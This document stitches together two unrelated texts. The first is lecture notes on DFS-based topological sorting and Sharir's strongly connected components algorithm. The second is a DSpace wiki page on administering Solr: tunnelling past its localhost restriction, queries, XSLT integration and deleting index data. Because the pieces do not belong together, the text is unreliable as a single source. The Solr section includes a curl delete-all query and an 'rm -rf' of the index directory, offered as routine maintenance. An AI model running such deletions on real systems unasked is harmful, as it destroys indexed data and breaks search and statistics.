TOPOLOGICAL SORT VIA DFS - We can also implement topological sort by using **DFS**! - The **finishing times** of nodes help us - Understanding this algo will be **key** for understanding **strongly connected components** Lemma 6.8 Suppose $D$ is a DAG. Then $f[v] < f[u]$ for every arc $uv$. <table> <thead> <tr> <th>edge type</th> <th>colour of $v$</th> <th>discovery/finish times</th> </tr> </thead> <tbody> <tr> <td>tree</td> <td>white</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>forward</td> <td>black</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>back</td> <td>gray</td> <td>$d[v] &lt; d[u] &lt; f[u] &lt; f[v]$</td> </tr> <tr> <td>cross</td> <td>black</td> <td>$d[v] &lt; f[v] &lt; d[u] &lt; f[u]$</td> </tr> </tbody> </table> Recall from DAG-testing: there are no back edges in a DAG. Theorem: if $D$ is a DAG, and we order vertices in reverse order of finishing time, then we get a topological ordering! To see why, suppose $D$ is a DAG and we order nodes in this way, so $f_{v_1} > f_{v_2} > \cdots > f_{v_{n-1}} > f_{v_n}$. For contradiction, suppose a right-to-left edge $\{u, v\}$ exists. Since edge $\{u, v\}$ exists, the lemma implies $f_v < f_u$. But this contradicts the node ordering! So all edges are left-to-right, hence this is a topological sort. Algorithm: $DFS(G)$ 1. InitializeStack($S$) 2. $DAG \leftarrow \text{true}$ 3. For each $v \in V(G)$: $colour[v] \leftarrow \text{white}$, $\pi[v] \leftarrow \emptyset$ 4. $time \leftarrow 0$ 5. For each $v \in V(G)$: If $colour[v] = \text{white}$ Then $DFSvisit(v)$ 6. If $DAG$ then return $(S)$ else return $(DAG)$ Algorithm: DFSvisit(v) \[ colour[v] \leftarrow \text{gray} \] \[ time \leftarrow time + 1 \] \[ d[v] \leftarrow time \] comment: \( d[v] \) is the discovery time for vertex \( v \) for each \( w \in Adj[v] \) \[ \begin{cases} \text{if} \ colour[w] = \text{white} \\ \quad \text{then} \quad \{ \\ \quad \quad \pi[w] \leftarrow v \\ \quad \quad \text{DFSvisit}(w) \\ \quad \} \text{if} \ colour[w] = \text{gray} \quad \text{then} \quad \text{DAG} \leftarrow \text{false} \end{cases} \] \[ colour[v] \leftarrow \text{black} \] \[ \text{Push}(S, v) \] \[ time \leftarrow time + 1 \] \[ f[v] \leftarrow time \] Running time \( O(n + m) \) with adjacency lists. We are pushing smallest finishing times first into a stack, so when we pop them out, we will get the largest finishing time first. Save each node when it finishes. The initial calls are \(\text{DFSvisit}(1)\), \(\text{DFSvisit}(2)\) and \(\text{DFSvisit}(3)\). The discovery/finish times are as follows: <table> <thead> <tr> <th>(v)</th> <th>(d[v])</th> <th>(f[v])</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>1</td> <td>4</td> </tr> <tr> <td>2</td> <td>5</td> <td>10</td> </tr> <tr> <td>3</td> <td>11</td> <td>12</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(v)</th> <th>(d[v])</th> <th>(f[v])</th> </tr> </thead> <tbody> <tr> <td>4</td> <td>6</td> <td>7</td> </tr> <tr> <td>5</td> <td>8</td> <td>9</td> </tr> <tr> <td>6</td> <td>2</td> <td>3</td> </tr> </tbody> </table> The topological ordering is 3, 2, 5, 4, 1, 6 (reverse order of finishing time). [Joke slide: I renamed "my documents" on your computer to "our documents". You haven't texted me in 1 minute and 42 seconds. Why are you ignoring me?] Strongly connected components. These are called strongly connected components (SCCs) STRONGLY CONNECTED COMPONENTS - It could also be divided into **three graphs**... - But we want our SCCs to be **maximal** (as large as possible) STRONGLY CONNECTED COMPONENTS • So, the goal is to find these (maximal) SCCs: FORMAL DEFINITIONS For two vertices $x$ and $y$ of $G$, define $x \sim y$ if $x = y$; or if $x \neq y$ and there exist directed paths from $x$ to $y$ and from $y$ to $x$. The relation $\sim$ is an **equivalence relation**. The **strongly connected components** of $G$ are the equivalence classes of vertices defined by the relation $\sim$. A strongly connected component of a digraph $G$ is a maximal strongly connected subgraph of $G$. Note: a connected component can contain just a **single node**. Example: a node with no out-edges. Consider this graph. These are its SCCs. The following is its component graph. It has one node for each SCC. And an edge between two nodes IFF there is an edge between the corresponding SCCs. Can there be a cycle in the component graph? No!
If there are paths both ways between components, they are actually the same SCC. Component graph is a DAG! APPLICATIONS OF SCCs AND COMPONENT GRAPHS • Finding all cyclic dependencies in code • Can find single cycle with an easier DFS-based algorithm • But it is nicer to find all cycles at once, so you don’t have to fix one to expose another APPLICATIONS OF SCCs AND COMPONENT GRAPHS - **Data filtering** before running other algorithms - Consider Google maps; nodes = intersections, edges = roads - Don’t want to run path finding algorithm on the entire **global** graph! - First restrict execution to a rectangle - Then throw away everything except the (maximal) SCC containing source & target BRAINSTORMING AN ALGORITHM • What if we run DFS, then reverse all edges, then run DFS (like checking whether an entire graph is strongly connected?) This will definitely visit every node in a’s SCC And in fact it might visit other SCCs as well… <table> <thead> <tr> <th>DFSVisit(a)</th> <th>DFSVisit(h)</th> <th>DFSVisit(j)</th> </tr> </thead> </table> Showing discovery times Showing finish times What if we run DFS, then reverse all edges, then run DFS? We fail to identify SCC \{ h, i \} Problem: from h, we can reach other SCCs What if we perform DFSVisit calls in a different order? Other reachable SCCs should be visited first Then, each DFSVisit will visit exactly one SCC What if we DFS visit $H$ according to a topological order in $C_G$ (some edges to unfinished SCCs) In $C_H$: all edges to finished SCCs Consider **component graph** $C_G$ of $G$ (which we want to compute) **Idea:** in a DAG, reverse finish time would be a topological sort! *Yes!* We will prove this… $G$ might not be a DAG… but $C_G$ is! Does reverse finish order in $G$ give us a topological sort of $C_G$? **PROVING DECREASING FINISH TIMES INDUCE A TOPOLOGICAL ORDER ON THE COMPONENT GRAPH** - **Definition:** For a strongly connected component $C$, let $d[C] = \min\{d[v] : v \in C\}$ and $f[C] = \max\{f[v] : v \in C\}$ - **Lemma:** If $C_i, C_j$ are SCCs and there is an edge $C_i \rightarrow C_j$, then $f[C_i] > f[C_j]$ - **Proof.** Case 1 ($d[C_i] < d[C_j]$): - Let $u$ be the earliest discovered node in $C_i$ - All nodes in $C_i \cup C_j$ are white-reachable from $u$, so they are *descendants in the DFS forest* and finish before $u$ - So $f[C_i] > f[C_j]$ $u$ = earliest discovered node in here PROVING DECREASING FINISH TIMES INDUCE A TOPOLOGICAL ORDER ON THE COMPONENT GRAPH • **Definition:** For a strongly connected component $C$, let $d[C] = \min\{d[v] : v \in C\}$ and $f[C] = \max\{f[v] : v \in C\}$ • **Lemma:** if $C_i, C_j$ are SCCs and there is an edge $C_i \rightarrow C_j$, then $f[C_i] > f[C_j]$ • **Proof.** Case 2 ($d[C_i] > d[C_j]$): - Since component graph is a DAG, there is **no path** $C_j \rightarrow C_i$ - Thus, **no nodes** in $C_i$ are reachable from $C_j$ - So we discover $C_j$ and finish $C_j$ **without** discovering $C_i$ - Therefore $d[C_j] < f[C_j] < d[C_i] < f[C_i]$. 
QED CONSEQUENCE OF THE LEMMA • So, if we perform $DFSVisit(u)$ on nodes from **largest to smallest** finishing time, any **other SCCs** reachable from the current SCC must already be **finished/black** • So each $DFSVisit(u)$ call will **explore precisely one SCC** USING THE LEMMA TO BUILD AN ALGORITHM • Algorithm: • \((v_{i_1}, v_{i_2}, \ldots, v_{i_n}) := DFS\_topsort(G)\) • \(H := \text{construct by reversing each edge in } G\) • return \( DFS\_SCC(H, (v_{i_1}, v_{i_2}, \ldots, v_{i_n})) \) This is called Sharir’s algorithm (sometimes Kosaraju’s algorithm). This paper first introduced it. Topological sort algorithm we saw earlier. Returns nodes ordered by finish time from largest to smallest. Calls DFSVisit on nodes in topological order, and gives each node an SCC number in a component[] array, which is then returned. **PSEUDOCODE** Assume that \( f[v_{i_1}] > f[v_{i_2}] > \cdots > f[v_{i_n}] \). **Algorithm:** \( DFS\_SCC(H, (v_{i_1}, v_{i_2}, \ldots, v_{i_n})) \)

```plaintext
for j ← 1 to n
    do colour[v_{i_j}] ← white
scc ← 0
for j ← 1 to n
    do if colour[v_{i_j}] = white
        then scc ← scc + 1
             DFSvisit(H, v_{i_j}, scc)
return (comp)
```

**Algorithm:** \( DFSvisit(H, v, scc) \)

```plaintext
colour[v] ← gray
comp[v] ← scc
for each w ∈ Adj[v]
    do if colour[w] = white
        then DFSvisit(H, w, scc)
colour[v] ← black
```

Running Sharir’s Algorithm Phase 1: DFS topological sort Phase 2: DFSVisit on the reverse graph, by reverse finish times DFSVisit(j) DFSVisit(h) DFSVisit(e) DFSVisit(a) $scc = 4$ ($scc$ is shown) PSEUDOCODE (repeated) Assume that \( f[v_1] > f[v_2] > \cdots > f[v_n] \). **Algorithm:** \( DFS\_SCC(H, (v_1, v_2, \ldots, v_n)) \)

```plaintext
for j ← 1 to n
    do colour[v_j] ← white
scc ← 0
for j ← 1 to n
    do if colour[v_j] = white
        then scc ← scc + 1
             DFSvisit(H, v_j, scc)
return (comp)
```

**Algorithm:** \( DFSvisit(H, v, scc) \)

```plaintext
colour[v] ← gray
comp[v] ← scc
for each w ∈ Adj[v]
    do if colour[w] = white
        then DFSvisit(H, w, scc)
colour[v] ← black
```

Complexity? \( O(n + m) \) Proof of Correctness of Sharir’s Algorithm First, note that $G$ and $H$ have the same strongly connected components. Let $u = v_{i_1}$ be the first vertex visited in step 3. Let $C$ be the s.c.c. containing $u$ and let $C'$ be any other s.c.c. $f(C) > f(C')$, so there is no edge from $C'$ to $C$ in $G$ (by the Lemma). Therefore there is no edge from $C$ to $C'$ in $H$. Hence no vertex in $C'$ is reachable from $u$ in $H$. Therefore, $DFSvisit(u)$ explores the vertices in $C$ (and only those vertices); this forms one DFS tree in $H$. Next, $DFSvisit(v_{i_2})$ explores the vertices in the s.c.c. containing $v_{i_2}$, etc. Every time we make an initial call to $DFSvisit$, we are exploring a new s.c.c. We increment $scc$, which is used to label the various s.c.c. $comp[v]$ denotes the label of the s.c.c. containing $v$. I did not go through this slide in class, and you do not need to know it. But if you are curious, here is a proof for the algorithm. FREQUENTLY ASKED QUESTION Could we simply do the DFSVisit calls for the second DFS in the original graph G, in order from smallest to largest finishing time? DFSVisit(5) would reach two SCCs. No! Depends where first DFS starts… If first DFS starts at a, then…
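For reference, here is a compact Python sketch (mine, not from the notes) of Sharir's/Kosaraju's algorithm as described above. The helper finish_order is the stack-based DFS from the topological-sort slides: reversing its output gives a topological order on a DAG and, more importantly here, the required decreasing-finish-time order. The second pass runs on the reversed graph and labels one SCC per initial visit, mirroring the comp[] array in the pseudocode.

```python
def finish_order(adj):
    """First pass: vertices in order of increasing finish time (the stack S)."""
    seen, finished = set(), []

    def visit(v):
        seen.add(v)
        for w in adj[v]:
            if w not in seen:
                visit(w)
        finished.append(v)               # Push(S, v) when v turns black

    for v in adj:
        if v not in seen:
            visit(v)
    return finished

def strongly_connected_components(adj):
    order = reversed(finish_order(adj))  # largest finish time first

    # Build H by reversing every edge of G.
    radj = {v: [] for v in adj}
    for v in adj:
        for w in adj[v]:
            radj[w].append(v)

    comp = {}                            # comp[v] = SCC label of v
    scc = 0

    def visit(v):
        comp[v] = scc
        for w in radj[v]:
            if w not in comp:
                visit(w)

    for v in order:
        if v not in comp:
            scc += 1                     # each initial call explores exactly one SCC
            visit(v)
    return comp

g = {"a": ["b"], "b": ["c"], "c": ["a", "d"], "d": []}
print(strongly_connected_components(g))  # a, b and c share one label; d gets its own
```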
Solr - Solr in DSpace - Connecting to Solr - Bypassing localhost restriction temporarily - Instructions specific to Tomcat 7 and newer - Instructions specific to Tomcat 6 and older - Bypassing localhost restriction permanently - Accessing Solr - Solr cores - Solr admin interface - Solr queries - Solr responses - PHP example - Examples - Date of last deposited item - Top downloaded items by a specific user - Number of items in a specific community - Breakdown of submitted items per month - Statistics breakdown per event type - Statistics: breakdown of downloads per month - Statistics: number of downloads (item views) for a specific item per month - Statistics: number of total downloads in a given time span - Querying Solr from XMLUI - Examples - Date of last deposited item - Multicore join queries - "AND" search as default - Deleting Solr index data - Solr delete query - Manually delete Solr index files - Set up Solritas (VelocityResponseWriter) - Guidepost Solr in DSpace What is Solr: http://lucene.apache.org/solr/features.html DSpace uses Solr as a part of Discovery as index to speed up access to content metadata and data about access to DSpace (for statistics). It also provides faceting, search results filtering and in newer versions of DSpace also hit highlighting and "More like this". If Discovery is enabled, the DSpace search field accepts Solr search syntax. Discovery is an optional part of DSpace since 1.7 (with big improvements and configuration format changes in 1.8). When enabled, Discovery replaces DSpace Search and Browse and provides Solr-based statistics. Since DSpace 3, it is also the default storage for the DSpace OAI-PMH provider (server) responses. Please, note, that to get data from Solr, you do not technically need to enable the Discovery aspect, but you do need to populate the index. The statistics core is populated automatically in DSpace 1.6+. To populate the search core (DSpace 1.7+), you need to run [dspace]/bin/dspace index-discovery (you will probably want to schedule it in cron to run periodically, too). In DSpace versions older than 4.x, the command was called [dspace] /bin/dspace update-discovery-index. There should be no reason to access the oai core (DSpace 3.0), because it contains the same information as the search core, but if you want to populate it, run [dspace]/bin/dspace oai import. Connecting to Solr By default, the DSpace Solr server is configured to listen only on localhost, port 8080 (unless you specified another port in Tomcat configuration and the [dspace]/config/modules/discovery.cfg file). That means that you cannot connect from another machine to the dspace server port 8080 and request a Solr URL - you’ll get a HTTP 403 error. This configuration was done for security considerations - Solr index contains some data that is not accessible via public DSpace interfaces and some of the data might be sensitive. Before you try to follow the advice below to bypass the localhost restriction, please note: - Exposing the Solr interface means, that any restricted metadata such as `dc.description.provenance` and non-anonymized usage statistics (client IPs, user agent strings) will be accessible. - Exposing the Solr interface also means that it will be exposed for **write access**. There is no easy way to expose only read access. - Never expose Solr to the internet. If you're exposing it to an IP within your network, add it as an exception to the LocalHostRestrictionFilter. 
If you have to expose Solr to a public IP, use an SSH tunnel or a VPN for the connection.

Bypassing localhost restriction temporarily

While you could make Solr publicly accessible by changing this default configuration, this is not recommended, because Solr indexes may contain some data you might consider private. Instead, use one of the following simple means to bypass this restriction temporarily. All of them will make Solr accessible only to the machine you're connecting from, for as long as the connection is open.

1. **OpenSSH client - port forwarding**

   Connect to the DSpace server and forward its port 8080 to port 1234 on localhost (the machine we're connecting from):

   ```bash
   ssh -L 1234:127.0.0.1:8080 mydspace.edu
   ```

   This makes mydspace.edu:8080 accessible via localhost:1234 (type `http://localhost:1234` in the browser address bar); it also opens an ssh shell. Exit the ssh session to terminate port forwarding.

   Alternatively:

   ```bash
   ssh -N -f -L 1234:127.0.0.1:8080 mydspace.edu
   ```

   Run with the `-N` and `-f` flags if you want ssh to go to the background; kill the ssh process to terminate port forwarding.

2. **PuTTY client - port forwarding**

   Local port forwarding:

   ![PuTTY Configuration for Local Port Forwarding](image)

   Once you're connected in PuTTY, visit `http://localhost:1234/solr/` and you should see Solr's web interface. No browser configuration is necessary.

   Dynamic port forwarding / SOCKS proxy*:

   ![PuTTY Configuration for Dynamic Port Forwarding](image)

   Once you're connected in PuTTY, you'll need to configure your browser to use localhost:1234 as a SOCKS proxy (and remove "localhost" and "127.0.0.1" from the addresses that bypass this proxy - like in the next step).

3. **OpenSSH client - SOCKS proxy**

   Connect to the DSpace server and run a SOCKS proxy server on localhost port 1234; configure the browser to use localhost:1234 as a SOCKS proxy and remove "localhost" and "127.0.0.1" from the addresses that bypass this proxy. All browser requests now originate from the dspace server (the source IP is the dspace server's IP) - dspace is the proxy server. Type `http://localhost:8080` in the browser address bar - localhost here is the dspace server.

   ```bash
   ssh -D 1234 mydspace.edu
   ```

*Note about PuTTY as SOCKS proxy - while it can be configured, it raises a security exception when Solr is accessed. If you figure this out, please add this method here.

Bypassing localhost restriction permanently

Privacy warning

Before you read this chapter, make sure you read Connecting to Solr and understand the consequences of any changes.

Instructions specific to Tomcat 7 and newer

Here's how you can:

1. turn off the localhost filter in Tomcat
2. replace it with a RemoteAddrValve and allow an enumerated set of IP addresses or subnets (in the following example the 127.0.0.1 and 123.123.123.123 IPs and the 111.222.233.* subnet would be allowed):

Change your server.xml or alternatively your context fragment (i.e. conf/Catalina/localhost/solr.xml) like this:

```
<Context path="/solr" reloadable="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.0\.0\.1|123\.123\.123\.123|111\.222\.233\.*"/>
  <Parameter name="LocalHostRestrictionFilter.localhost" value="false" override="false"/>
</Context>
```

Do not forget to include localhost (i.e. 127.0.0.1) in the allowed list, otherwise Discovery, OAI 2.0 and other things depending on Solr won't work.

See also:

- Tomcat 7 documentation: Remote Address Filter
- DS-1260
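Whichever approach you choose, it can help to confirm from the client machine whether the Solr core actually answers before digging further into the Tomcat configuration. The following is a minimal sketch (ours, not part of this page) using only the Python standard library; the URL assumes the default DSpace Solr location used throughout this page, so adjust it if your port or context path differ.

```python
#!/usr/bin/env python3
"""Check whether the DSpace 'search' core answers from this machine."""
import urllib.error
import urllib.request

# Default DSpace Solr URL; adjust host, port or context path if yours differ.
SOLR_URL = "http://localhost:8080/solr/search/select?q=*:*&rows=0"

try:
    with urllib.request.urlopen(SOLR_URL, timeout=10) as resp:
        print("Reachable, HTTP", resp.status)
except urllib.error.HTTPError as e:
    # HTTP 403 usually means the LocalHostRestrictionFilter (or the
    # RemoteAddrValve) is rejecting this client's IP address.
    print("Blocked or failed, HTTP", e.code)
except urllib.error.URLError as e:
    print("Connection failed:", e.reason)
```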
Instructions specific to Tomcat 6 and older

Please note that the syntax of the "allow" attribute changed in Tomcat 7 to a single regular expression. In Tomcat 6 and older, it was a comma-separated list of regular expressions, therefore this worked in Tomcat 6, but does not work in Tomcat 7+:

```
<Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="111.222.233.*, 123.123.123.123, 127.0.0.1"/>
```

See also: Tomcat 6 documentation: Remote Address Filter

Accessing Solr

Solr cores

DSpace contains a so-called multicore installation of Solr. That means that there are multiple Solr indexes and configurations sharing one Solr codebase. If you're familiar with Apache HTTPD, it is analogous to multiple virtual hosts running on one Apache server (separate configuration and webpages), except that individual Solr cores are accessible via different URLs (as opposed to virtualhost IP:port).

The two Solr instances in DSpace Discovery are called "search" and "statistics". search contains data about communities, collections, items and bitstreams. statistics contains data about searches, accessing users, IPs etc.

The two instances are accessible at the following URLs (relative to the dspace server):

- http://localhost:8080/solr/search/
- http://localhost:8080/solr/statistics/

Solr admin interface

Both Solr cores have separate administration interfaces which let you view their respective schemas and configurations, set up logging and submit queries. The schema browser here is very useful to list the fields (and their types) included in each index and even see an overview of the most common values of individual fields with their frequency.

Solr queries

The base URL of the default Solr search handler is as follows:

- http://localhost:8080/solr/search/search
- http://localhost:8080/solr/statistics/search

Using the knowledge of particular fields from Solr Admin and Solr syntax (SolrQuerySyntax, CommonQueryParameters) you can make your own search requests. You can also read a brief tutorial to learn the query syntax quickly.

You can also look at the solr log file (in older dspace versions, this was logged to catalina.out) to see queries generated by XMLUI in real time:

```
tail -f /dspace/log/solr.log
```

(depending on your OS, Tomcat installation method and logging settings, the path may be different)

Solr responses

By default, Solr responses are returned in XML format. However, Solr can provide several other output formats including JSON and CSV. Discovery uses the javabin format. The Solr request parameter is wt (e.g. &wt=json). For more information, see Response Writers, QueryResponseWriters.

An interesting option is to specify an XSLT stylesheet that can transform the XML response (server-side) to any format you choose, typically HTML. Append &wt=xslt&tr=example.xsl to the Solr request URL. The .xsl files must be provided in the `/dspace/solr/search/conf/xslt/` directory. For more information, see XsltResponseWriter.
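As an illustration of the wt parameter described above, here is a small sketch (ours, not part of the original page) that requests a JSON response from the search core and reads numFound; the URL and the search.resourceType field follow the defaults used elsewhere on this page.

```python
#!/usr/bin/env python3
"""Query the DSpace 'search' core with wt=json and print the item count."""
import json
import urllib.parse
import urllib.request

params = urllib.parse.urlencode({
    "q": "search.resourceType:2",  # items only (see the Examples section)
    "rows": 0,                     # we only need the total count
    "wt": "json",                  # ask Solr for a JSON response
    "omitHeader": "true",          # drop the responseHeader block
})
url = "http://localhost:8080/solr/search/select?" + params

with urllib.request.urlopen(url, timeout=10) as resp:
    data = json.load(resp)

print("Items indexed:", data["response"]["numFound"])
```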
**PHP example**

```php
$solr_baseurl_dspace = "http://localhost:8080/solr/search/select?";
$solr_query = "test";
// use "AND withdrawn:false" with DSpace newer than 1.8
$solr_URL_dspace = $solr_baseurl_dspace . "wt=phps&q=" . urlencode($solr_query . "* AND withdrawn:false");
$response_dspace = file_get_contents($solr_URL_dspace, false, stream_context_create(array('http' => array('timeout' => 10))));
$result_dspace = unserialize($response_dspace);
$num_dspace = $result_dspace['response']['numFound'];
echo $num_dspace;
```

Keep in mind that although using the phps writer may be faster, it's not recommended for untrusted user data (see the PHP unserialize() notes).

Examples

Date of last deposited item

To get all items (search.resourceType:2) sorted by date accessioned (dc.date.accessioned_dt) in order from newest to oldest (desc; %20 is just a URL-encoded space character):

```
http://localhost:8080/solr/search/select?q=search.resourceType:2&sort=dc.date.accessioned_dt%20desc
```

Note:

<table>
<thead>
<tr>
<th>Value</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>search.resourceType:2</td>
<td>items</td>
</tr>
<tr>
<td>search.resourceType:3</td>
<td>communities</td>
</tr>
<tr>
<td>search.resourceType:4</td>
<td>collections</td>
</tr>
</tbody>
</table>

To get only the first (newest) item (rows=1), with all but the date accessioned field filtered out (fl=dc.date.accessioned) and without the Solr response header (omitHeader=true), append `&rows=1&fl=dc.date.accessioned&omitHeader=true` to the query above.

Top downloaded items by a specific user

Number of items in a specific community

Note:

<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>facet.field=epersonid</td>
<td>You want to group by epersonid, which is the user id</td>
</tr>
<tr>
<td>type:0</td>
<td>Interested in bitstreams only</td>
</tr>
</tbody>
</table>

Statistics breakdown per event type

Statistics: breakdown of downloads per month

Statistics: number of downloads (item views) for a specific item per month

Statistics: number of total downloads in a given time span

Querying Solr from XMLUI

Since Solr returns its responses in XML, it's possible and easy to call custom Solr queries from XMLUI, process the XML response with XSLT and display the results in human-readable form on the HTML page. There are two ways to do that - synchronously in Cocoon or asynchronously using AJAX (JavaScript) after the page is loaded. Solr queries are usually very fast, so only synchronous calls will be shown here.

You can include another XML document to be processed by XSLT using the `document()` function. The parameter to this function is a string with the path to the XML document to process. This can be either a static .xml file stored on the server filesystem or a URL, which will be fetched at the time of processing. For Solr, the latter is what we need. Furthermore, we need to distinguish templates for processing this external XML document as opposed to the input XML document. We'll do this using the `mode` attribute and define a different processing mode for each query.
```xml
<xsl:apply-templates select="document('http://localhost:8080/solr/search/select?q=search.resourcetype:2&amp;sort=dc.date.accessioned_dt%20desc&amp;rows=1&amp;fl=dc.date.accessioned_dt&amp;omitHeader=true')" mode="solr-response"/>
```

Now we need to define a template with the same `mode` that matches elements contained in the Solr response XML:

```xml
<xsl:template match="/response/result/doc/date" mode="solr-response">
  Last item was imported: <xsl:value-of select="text()"/>
</xsl:template>
```

Furthermore, we don't want to hardcode the `http://localhost:8080` Solr URL, because this can be changed in the config file and that would break the template. So we'll call a Java function from XSLT to retrieve the configured Solr URL. See the complete example in the next section.

**Examples**

**Date of last deposited item**

For a description of the query parameters, see [above](#).

1. Add the `confman` namespace and "confman" to exclude-result-prefixes. (For an explanation, see how to [Call Java methods from XSLT (Manakin)](#).)

```xml
<xsl:stylesheet ...
   xmlns:confman="org.dspace.core.ConfigurationManager"
   exclude-result-prefixes="... confman">
```

2. Add this simple template to process the Solr query result. More complex date formatting can be done easily in XSLT 2.0 (see [XSLT 2.0 spec](#)), however Cocoon still uses XSLT 1.0 (see [DS-995](#)). It is currently also possible to call Java functions to do date formatting.

```xml
<xsl:template match="/response/result/doc/date" mode="lastItem">
  Last item was imported: <xsl:value-of select="substring(text(), 1, 10)"/>
</xsl:template>
```

3. Add the following code to the place where you want the resulting text to appear:

```xml
<xsl:variable name="solr-search-url" select="confman:getProperty('discovery', 'search.server')"/>
<xsl:apply-templates select="document(concat($solr-search-url, '/select?q=search.resourcetype:2&amp;sort=dc.date.accessioned_dt%20desc&amp;rows=1&amp;fl=dc.date.accessioned_dt&amp;omitHeader=true'))" mode="lastItem"/>
```

For example, to add it after the list of Recent items in Mirage, override its template like this:

Multicore join queries

Solr supports join queries across multiple cores since Solr 4.0. Thus it's also supported in DSpace 4.0 (which includes Solr 4.4).

**Example query (not tested)**

http://localhost:8080/solr/search/select/?q=*:*&fq={!join from=owningItem to=search.resourceid fromIndex=statistics}title:"Testing title"

"AND" search as default

Up to and including DSpace 5 (see DS-2809), Discovery uses the "OR" operator as default if you don't specify an operator between your query keywords. So searching for "John Doe" will also return entries like "Jane Doe" and "John Connor". If you want to change that, you have to edit the schema.xml file of the Solr search core.

In [dspace]/solr/search/conf/schema.xml, find this line:

```xml
<solrQueryParser defaultOperator="OR"/>
```

and change it to

```xml
<solrQueryParser defaultOperator="AND"/>
```

Then restart your servlet container (Tomcat).

**Warning**

It's not officially recommended to change the defaultOperator setting. Some unrelated Discovery features might stop working if you do this. I haven't noticed anything wrong, but you might. If something breaks, make sure to notify us and we'll try to fix it or remove this tip.
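Before editing schema.xml as described above, you may want to see what the change would do for a given query. The sketch below (ours, not from the original page) runs the same two-keyword query once with q.op=OR and once with q.op=AND, which override the default operator for a single request, and prints the hit counts; the Solr URL is the default one assumed on this page and the query string is just an example.

```python
#!/usr/bin/env python3
"""Compare hit counts under the OR and AND default operators via q.op."""
import json
import urllib.parse
import urllib.request

BASE = "http://localhost:8080/solr/search/select?"
QUERY = "John Doe"  # example two-keyword query

for op in ("OR", "AND"):
    params = urllib.parse.urlencode({
        "q": QUERY,
        "q.op": op,          # per-request override of the default operator
        "rows": 0,
        "wt": "json",
        "omitHeader": "true",
    })
    with urllib.request.urlopen(BASE + params, timeout=10) as resp:
        found = json.load(resp)["response"]["numFound"]
    print("q.op=%s: %d hits" % (op, found))
```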
Deleting Solr index data

If for whatever reason you need to delete the data in your index, here's how you can do it. Deleting the index would normally be followed by running [dspace]/bin/dspace index-discovery to rebuild it (in DSpace versions older than 4.x, the command was called [dspace]/bin/dspace update-discovery-index); alternatively, you can run that command with the -b parameter to wipe and rebuild the index in one step.

**Solr delete query**

If Solr is running, you can access the following URL from the server where Solr is installed (remember the default localhost restriction):

```
$ curl "http://localhost:8080/solr/search/update?commit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
```

This will delete all documents in the **search** (Discovery) core. You can verify the number of documents in the core by running the following query and checking the value of the `numFound` attribute in the output:

```
$ curl "http://localhost:8080/solr/search/select/?q=*:*&rows=0"
<?xml version="1.0" encoding="UTF-8"?>
<response>
  <lst name="responseHeader">
    <int name="status">0</int>
    <int name="QTime">5</int>
    <lst name="params">
      <str name="rows">0</str>
      <str name="q">*:*</str>
    </lst>
  </lst>
  <result name="response" numFound="0" start="0"/>
</response>
```

The URL listed in the examples is the default Solr URL in DSpace. If you changed it, you can find it in `search.server` in `[dspace]/config/modules/discovery.cfg` (DSpace 1.8+) or in `solr.log.server` in `[dspace]/config/dspace.cfg` (DSpace 1.7).

Source: Solr Wiki FAQ: How can I delete all documents from my index?

**Manually delete Solr index files**

If your Solr is broken and you can't issue queries, you can still delete the index files manually:

```
$ rm -rf [dspace]/solr/search/data/
```

Then restart the servlet container or reload the `solr` webapp.

See also:

- Solr: How can I delete all documents from my index?
- DSpace: deleted wrong directory

**Set up Solritas (VelocityResponseWriter)**

Solritas is a generic search interface on top of a Solr index. It can be useful if you want to explore the contents of a Solr index (core) using facets.

To set it up in DSpace 3.0 (which uses Solr 3.5.0):

- download `apache-solr-3.5.0.tgz` from [http://archive.apache.org/dist/lucene/solr/3.5.0/](http://archive.apache.org/dist/lucene/solr/3.5.0/)
- `tar xvzf apache-solr-3.5.0.tgz`
- `mkdir [dspace]/solr/lib`
- `cp ./apache-solr-3.5.0/dist/apache-solr-velocity-3.5.0.jar [dspace]/solr/lib`
- `cp ./apache-solr-3.5.0/contrib/velocity/lib/{commons-beanutils-1.7.0.jar,commons-collections-3.2.1.jar,velocity-1.6.4.jar,velocity-tools-2.0.jar} [dspace]/solr/lib`
- edit `[dspace]/solr/solr.xml` and add the sharedLib attribute:

```xml
<solr persistent="false" sharedLib="lib">
```

- edit the solrconfig.xml file of each core where you want to use Solritas.
Example for the "search" core: add the velocity ResponseWriter and requestHandler in [dspace]/solr/search/conf/solrconfig.xml:` <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter"/> <requestHandler name="/browse" class="solr.SearchHandler"> <lst name="defaults"> <str name="v.template">browse</str> <str name="v.contentType">text/html;charset=UTF-8</str> <str name="title">Solritas</str> <str name="wt">velocity</str> <str name="defType">dismax</str> <str name="q.alt">*:*</str> <str name="rows">10</str> <str name="fl">*,score</str> <str name="facet">on</str> <str name="facet.field">title</str> <str name="facet.mincount">1</str> <str name="qf"> text^0.5 title^1.5 </str> </lst> <!--<lst name="invariants">--> <!--<str name="v.base_dir">/solr/contrib/velocity/src/main/templates</str>--> <!--</lst>--> <!--</requestHandler--> • cp -r ./apache-solr-3.5.0/example/solr/conf/velocity [dspace]/solr/search/conf/ • restart Tomcat • Solritas should be available at http://localhost:8080/solr/search/browse/ It should also be possible to use it in other versions of DSpace (starting from 1.6), but these use different versions of Solr, so modify the procedure accordingly (and expect other caveats): <table> <thead> <tr> <th>DSpace</th> <th>Solr</th> </tr> </thead> <tbody> <tr> <td>DSpace 6</td> <td>4.10.2</td> </tr> <tr> <td>DSpace 5</td> <td>4.10.2</td> </tr> <tr> <td>DSpace 4</td> <td>4.4.0</td> </tr> <tr> <td>DSpace 3</td> <td>3.5.0</td> </tr> <tr> <td>DSpace 1.8</td> <td>3.3.0</td> </tr> <tr> <td>DSpace 1.7</td> <td>1.4.1</td> </tr> <tr> <td>DSpace 1.6</td> <td>1.3.0</td> </tr> </tbody> </table> Note: In older versions, you may need to specify the queryResponseWriter class as org.apache.solr.request.VelocityResponseWriter 